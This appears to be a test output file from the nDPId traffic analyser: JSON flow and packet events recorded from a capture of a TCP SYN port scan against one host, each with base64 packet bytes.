+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAscLcAACsGrLusEAAIQA2GNIzSHufdUoMYAAAAAGACEAAJqAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTUAADcG3D2sEAAIQA2GNIzSgAzdUoMYAAAAAGACEACoggAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0EAADAGGTGsEAAIQA2GNIzSAKPdUoMYAAAAAGACBAAz7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMqQAACwG6c6sEAAIQA2GNIzSDOXdUoMYAAAAAGACBAAnqgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsm\/MAACcGhX+sEAAIQA2GNIzSCJjdUoMYAAAAAGACEAAf9wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAspNsAADoGaZesEAAIQA2GNIzSG57dUoMYAAAAAGACDAAQ8QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsU6cAACoGysusEAAIQA2GNIzSBCndUoMYAAAAAGACDAAoZgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsZn8AAC4Gs\/OsEAAIQA2GNIzSgAjdUoMYAAAAAGACDACshgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZsAACUG\/desEAAIQA2GNIzSBOvdUoMYAAAAAGACCAArpAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDIAADEG+0CsEAAIQA2GNIzSJXvdUoMYAAAAAGACCAALFAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsglIAACkGnSCsEAAIQA2GNIzSiqzdUoMYAAAAAGACCACl4gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3cAADkGo\/usEAAIQA2GNIzSJ2LdUoMYAAAAAGACCAAJLQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsBO4AADEGEoWsEAAIQA2GNIzSAAfdUoMYAAAAAGACCAAwiAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgIAADEGaXCsEAAIQA2GNIzSB93dUoMYAAAAAGACCAAosgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsRe0AADIG0IWsEAAIQA2GNIzSAdDdUoMYAAAAAGACDAAqvwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5QAADgGzN6sEAAIQA2GNIzSF4ndUoMYAAAAAGACBAAdBgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAswz8AACUGYDOsEAAIQA2GNIzSFmLdUoMYAAAAAGACCAAaLQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsL+0AAC4G6oWsEAAIQA2GNIzSH1XdUoMYAAAAAGACDAANOgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsKdMAADAG7p+sEAAIQA2GNIzSDb3dUoMYAAAAAGACBAAm0gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsms0AADcGdqWsEAAIQA2GNIzSBEDdUoMYAAAAAGACEAAkTwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsCD4AADcGCTWsEAAIQA2GNIzSA+fdUoMYAAAAAGACEAAkqAAAAgQFtA=="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1278275059338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9vMAADkGGH+sEAAIQA2GNIzdAHHcUoIYAAAAAGACCAAyEwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0AAACkGXDKsEAAIQA2GNIzTG57dU4MZAAAAAGACCAAU7gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs0NgAACYGUZqsEAAIQA2GNIzTCJjdU4MZAAAAAGACDAAj9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 